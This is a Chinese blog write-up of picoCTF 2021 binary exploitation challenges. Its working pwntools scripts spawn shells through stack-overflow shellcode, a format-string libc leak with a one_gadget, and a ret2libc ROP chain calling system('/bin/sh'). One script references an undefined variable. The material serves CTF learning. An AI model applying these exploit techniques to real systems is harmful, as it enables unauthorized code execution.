2021 Picoctf pwn部分wp

最新推荐文章于 2023-03-27 21:23:33 发布
最新推荐文章于 2023-03-27 21:23:33 发布
阅读量531 收藏
点赞数
分类专栏: pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_46521144/article/details/115460213
版权

首先说一下,是参考了校内学长的复盘讲解hhh,这也是第一次直接接触在线的ctf而不是靶场。

Gauntlet1

在ida里面看一下。这三道Gauntlet都是一个类型的,漏洞都是一个格式化字符串+栈溢出。
在这里插入图片描述
在这里插入图片描述
那就很容易直接把shellcraft.sh()写道栈上,因为一开始给打印了背写区域的起始位置并且使可执行的栈,一溢出就会跳转到我们写的shellcraft上面执行。注意中间还要有个格式化字符串的额send,不要忘了,之前卡在这里好久啊。。。

exp

from pwn import *
context.arch = 'amd64'
context.log_level='debug'

io=process('./gauntlet1')
# io=remote('mercury.picoctf.net',24284)
# context.log_level='debug'
stack=int(io.recvline(),16)
# stack=hex(stack)
print "stack---->"+hex(stack)
io.sendline('a')
io.recv()

# gdb.attach(io,"b *0x40074D")
payload=asm(shellcraft.sh()).ljust(120,'a')
payload+=p64(stack)

io.sendline(payload)

io.interactive()

Gauntlet2

这题和上一题保护上没什么区别
在这里插入图片描述
只是不在给打印dst地址了,但是利用第一个格式化字符串漏洞可以泄露寄存器rsp的地址

Gauntlet3

这个题多加了一个栈不可执行保护。那么就用一般的格式化字符串流程,泄露一个标准库函数的加载地址,推算出libc基地址,再由基地址+偏移传递/bin/sh或者one_gardet到溢出位置getshell
这道题有一个比较坑的地方是格式化字符串不能直接打印libc库函数地址,并且没给libc。那就只能先寻找有偏移的了,一般找不到libc是先尝试UBUNTU18版本的,也就是2.27
这里学校学长用的是2.27-3ubuntu1.4_amd64
在这里插入图片描述
计算偏移量:可以根据栈上0的标志结合%p输出计算得到libc_start_main的偏移量为23。
输出一下
在这里插入图片描述
然后看看libc基址在什么位置被加载,则根据这两者之间的差也可以计算出偏移量
在这里插入图片描述因此偏移量为0x21bf7之后的所有加载偏移量都不会再改变了。
之后就可以使用one_gardet
在这里插入图片描述
选择其中一个尝试一下发现就能过了。当然如果都过不了就直接system再rop rdi“/bin/sh”。但总之感觉这里是已经知道libc版本才敢这样写,否则会很心虚。。。不过也可以远程打印验证

exp

from pwn import *

context.arch = 'amd64'
context.log_level = 'debug'


binary = ("./gauntlet")
elf = ELF(binary)
libc = elf.libc

r.sendline("%23$p")
a = int( r.recvline(), 16 ) - 0x21bf7 
info("libc: " + hex(a))
libc.address = a

onegadget = a + 0x4f432
payload = 'a'*0x78 + p64(onegadget)

r.sendline(payload)
r.interactive()

here’s libc

打开ida,看一眼,发现do_stuff函数
在这里插入图片描述
这里相当于两个get(s)可以直接溢出,所以能劫持程序流程。
第一次溢出泄露puts的加载地址,第二次用one_gardet即可
然而one_gardet尝试了都没有用,那就直接发system但是这里有一个栈平衡问题,加上一个ret即可

from pwn import *
context.log_level='debug'
io=process('./vuln')
elf=ELF('./vuln')
libc=ELF('./libc.so.6')

puts_got=elf.got['puts']
puts_plt=elf.plt['puts']
ret=0x000000000040052e

pop_rdi=0x0000000000400913
main=0x0000000000400771

io.recvline()

payload='a'*0x88+p64(pop_rdi)+p64(puts_got)+p64(puts_plt)+p64(main)
io.sendline(payload) # frist time overflow
io.recvline()
puts_addr = u64(io.recv(6).ljust(8,'\x00'))
print hex(puts_addr)
libc_addr=puts_addr-libc.sym['puts']
print "libc_addr----->"+hex(libc_addr)

# one_gardet is not useful
# one_gadget=0x10a45c+libc_addr




system=libc.sym['system']+libc_addr
bin_sh=libc.search('/bin/sh').next()+libc_addr

io.recvline()


payload2='a'*0x88+p64(ret)+p64(pop_rdi)+p64(bin_sh)+p64(system)#keep stack balance

# gdb.attach(io,"b *0x000000000040076F")
io.sendline(payload2)

io.interactive()

在这里插入图片描述

N1ch0l4s
关注
专栏目录
picoCTF-WP
luoluopeach
10-17 2515
The Numbers Description:The numbers… what do they mean? Hints:The flag is in the format PICOCTF{} a-1 b-2 c-3 d-4 e-5 f-6 g-7 h-8 i-9 j-10 k-11 l-12 m-13 n-14 o-15 p-16 q-17 r-18 s-19 t-20 u-21 v-22 w-23 x-24 y-25 z-26 大括号前数字对应的字母是PICOCTF GET FLAG!
ciscn2021初赛pwn部分wp
eeeeeight的博客
05-17 1187
ciscn2021初赛 感谢wepn的队友 Column: May 17, 2021 pwny: 首先ida看一眼发现read文件描述符全是3, 好像是读个随机数, 然后我们在3的地址上连着用Write读两次就可以把他变成0, 就可以写入内存了, 后面就是数组越界写, 负数可以往前面读读出libc偏移和pie偏移, 在得到libc之后可以获得环境变量environ的地址, 之后通过(libc_base+libc.sym[‘environ’]-pie_base-0x202060)/8, 就可以得到其位置是数组
PicoCTF2021:Git du CTF PicoCTF版本2021
04-05
PicoCTF2021 解决方案在2021年版《麻烦日报》上的无人驾驶解决方案(Voici mon petitdépôtsansprétention) 密码学 网络开发 领先 饼干 寻宝游戏 需要一些组装1 需要一些组装2 逆向工程 转型 速度和进给 法证 资讯资讯 娃娃娃 Wireshark doo dooo doo… 一般技能 听话的猫 Python争吵 挥旗 尼斯网猫 静电并不总是噪音 Tab,Tab,Attack Magikarp地面任务
picoctf 2021 Scavenger Hunt
weixin_55466841的博客
05-05 206
part1 part2 part3 robots协议也叫robots.txt(统一小写)是一种存放于网站根目录下的ASCII编码的文本文件,它通常告诉网络搜索引擎的漫游器(又称网络蜘蛛),此网站中的哪些内容是不应被搜索引擎的漫游器获取的,哪些是可以被漫游器获取的。因为一些系统中的URL是大小写敏感的,所以robots.txt的文件名应统一为小写。robots.txt应放置于网站的根目录下。如果想单独定义搜索引擎的漫游器访问子目录时的行为,那么可以将自定的设置合并到根目录下的robots.tx.
picoCTF2021 GET aHEAD
scrawman的博客
04-05 942
题目提示: Hints1:Maybe you have more than 2 choices Hints2:Check out tools like Burpsuite to modify your requests and look at the responses 用bp抓包会发现Choose Red用的是GET方法,Choose Blue用的是POST方法(其实源码里也能看出来),结合Hints猜测可能要用其它的请求方法。查了一下发现HTTP请求还有一个HEAD方法,正好题目名字也是GET aHE.
picoctf-2021-Ym
04-02
picoctf-2021-Ym
2021东华杯pwn部分wp
eeeeeight的博客
11-01 1612
前言: 除了boom都蛮简单的, 第四个pwn因为boom做的有点久就没来得及, 看了眼感觉不难也就不想花时间再做了 cpp1: 由于change时std::cin的大小没有控制好, 所以cin可以输入很多字符, 导致了堆溢出, 且申请回来的时候没有手动清空fd位, 泄露了heap偏移, 得到了tcache结构体的地址, 利用堆溢出控制free块的fd就可以控制整个tcache结构体, 从而使得unsorted bin产生. 同上, 泄露libc偏移, 再利用fd写__free_hook与system, 再
2021鹤城杯pwn部分wp
eeeeeight的博客
10-09 2104
littleof 白给的ret2libc, 第一个输出泄露canary, 第二个输出泄露libc基址顺便控制一下返回地址再返回去输入, 之后就getshell咯(摊手) #!/usr/bin/env python #coding=utf-8 from pwn import* sh = remote("182.116.62.85", 27056) #sh = process('./littleof') elf = ELF('./littleof') libc = ELF('./libc-2.27.so')
2021长城杯pwn部分wp
eeeeeight的博客
09-19 6049
前言: 就, 除了vmpwn都是基础glibc的heap题 king_in_heap_1: delete函数没有把free后的指针置零, 存在uaf, 然后用unsortedbin的fd指向io结构体泄露libc, 然后mallochook上用realloc调整一下, 打onegadget就完事了 #!/usr/bin/env python # coding=utf-8 from pwn import * sh=remote('47.104.175.110',20066) #sh=process('./ki
赣网杯2021_pwn1.rar
12-11
赣网杯2021 pwn1 bin ctf
RogersCoolKids-Writeups-picoCTF-2021:这些是问题的写照
04-05
RogersCoolKids-Writeups-picoCTF-2021 这些是问题的补充:播放Nice,Disk,disk,sleuth! II,New Vignere,X代表位置,并且在picoCTF 2021Spring竞赛中非常非常隐蔽。
picoCTF2022_wp
fly1ng_pengu1n的博客
03-27 5164
picoCTF2022_wp_fgps
CG-CTF pwn部分wp
awxnutpgs545144602的博客
08-16 400
面向pwn刷cgctfPWN1,When did you born题目给了一个ELF文件,和一个.C文件先运行ELF,大概如下What’s Your Birth?0What’s Your Name?0You Are Born In 0You Are Naive.You Speed One Second Here.打开.C文件,发现是ELF的源码 #include ...
[CTF-PWN]攻防世界新手村-level2[wp]
murongxuege的博客
10-04 675
事件起因(无语) 手残博主因在27日从根地址误删了自己两年半配置和使用的kali虚拟机。。。在一步步恢复环境配置的时候,从头到尾刷一遍题,总结思路。 题目分析 开启场景后,服务端会开启对应的端口,并在端口上部署和附件相同的ELF二进制可执行文件,我们要做的就是下载附件并在本地进行反汇编,反编译等操作分析程序漏洞,从而利用漏洞获取题目的flag。 checksec监测 file查看一下文件属性,可以看到文件是linux elf文件,32字节,Inter80386微处理器。 checksec的常用命令是:c
picoCTF pwn wp - Stonks
fa1c4的blog
06-25 452
给了源码 #include <stdlib.h> #include <stdio.h> #include <string.h> #include <time.h> #define FLAG_BUFFER 128 #define MAX_SYM_LEN 4 typedef struct Stonks { int shares; char symbol[MAX_SYM_LEN + 1]; struct Stonks *next; } Stonk; ty
[BUUCTF]PWN——picoctf_2018_rop chain
mcmuyanga的博客
11-04 1018
picoctf_2018_rop chain 附件 步骤: 例行检查,32位,开启了NX保护 试运行一下程序,看到输入太长数据会崩溃 32位ida载入,习惯性的检索程序里的字符串,看见了flag.txt,双击跟进 看到程序将flag读入到了参数s里面,满足条件win1&&win2 &&a1==-59039827的条件,就能读出flag 从main函数开始看程序 vuln()函数 gets函数输入,没有限制读入长度,存在溢出漏洞,覆盖ret为flag函数地址,之后想
Artisinal Handcrafted HTTP 3 picoctfwp
weixin_43266721的博客
10-17 215
题目描述:We found a hidden flag server hiding behind a proxy, but the proxy has some… interesting ideas of what qualifies someone to make HTTP requests. Looks like you’ll have to do this one by hand. Try ...
NKCTF pwn方向wp
最新发布
maple105890的博客
03-27 521
然后放堆快指针的附近有malloc_context+0x18的地址,里面有很多dirty_data,而且got表可写,泄露出来打free函数。然后发现二次输入能直接把rbp末尾覆盖成\x00,那就在栈中构造rop链就好了。所以考虑和ez_stack一样的做法,比爆破ogg快多了。虽然给了libc,但构造了⼀下shellcode也能出。存在格式化字符串漏洞,先把cananry泄露出来。给了libc,可以光明正大偷鸡了bushi。直接rand搞一下就出了,连爆破都不用。和西湖那题有一点像,但那题还要抬栈。
TAMU ctf pwn部分wp+赛后
z1r0的博客
04-19 2393
TAMU ctf pwn部分wp 国外的题目,终端连不上就很gan ga。。。。。。 Tr*vial 大水题,栈溢出,ret2text exp from pwn import * context(arch='amd64', os='linux', log_level='debug') file_name = './z1r0' li = lambda x : print('\x1b[01;38;5;214m' + x + '\x1b[0m') ll = lambda x : print('\x1b[01
二进制利用入门:Pwn挑战解析
"Introduction-to-Pwn.pdf - pwn学习手册" 在网络安全领域,"pwn"是一种专门针对二进制漏洞利用的技术,它涉及到如何利用软件中的安全漏洞来控制或破坏系统。"Introduction to Pwn"这份手册是为那些对中级到高级的...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值